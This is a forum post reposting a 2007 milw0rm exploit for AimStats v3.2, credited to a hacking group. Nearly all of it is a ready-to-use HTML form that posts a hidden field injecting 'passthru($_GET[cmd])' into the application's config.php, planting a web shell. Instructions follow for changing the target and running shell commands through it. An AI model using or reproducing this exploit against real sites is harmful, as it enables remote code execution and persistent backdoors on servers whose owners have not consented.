Jump to content
buRn

AimStats 3.2 (process.php update) Remote Code Execution Expl

Recommended Posts

Posted

<!--

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

+ +

+ Y! Underground Group +

+ +

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

+ +

+ Portal......: AimStats v3.2 +

+ Author......: Dj7xpl / Dj7xpl@Yahoo.com +

+ Type........: Remote Code Execution +

+ Download....: http://www.x-pose.org/aimstats.php +

+ Page........: http://Dj7xpl.2600.ir +

+ +

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

+ +

+ Xpl.........: + -->

<html><head><Title>---===AimStats v3.2===------===Dj7xpl===---</title></head>

<body bgcolor="red">

<center>

<form name="AimStats" method="post" action="http://site.com/path to aimstats/process.php?update=yes">

<input name="taglinelimit" value="777" type="hidden" >

<input name="number" value="11; passthru($_GET[cmd]);//;" type="hidden" >

<input type="submit" name="Submit" value="Submit" >

</form>

<font color="#C0FF3E" size="+1"> Please change Target And Run This Script</font>

<font color="#C0FF3E" size="+1"> And See Backdoor into http://[Target]/[Path]/config.php?cmd=shell</font></br>

<font color="#C0FF3E" size="+1"> E.g : http://site.com/aimstats/config.php?cmd=ls -la</font>

</center>

</body>

</html>

<!--

+ +

+ +

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -->

# milw0rm.com [2007-04-18]

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...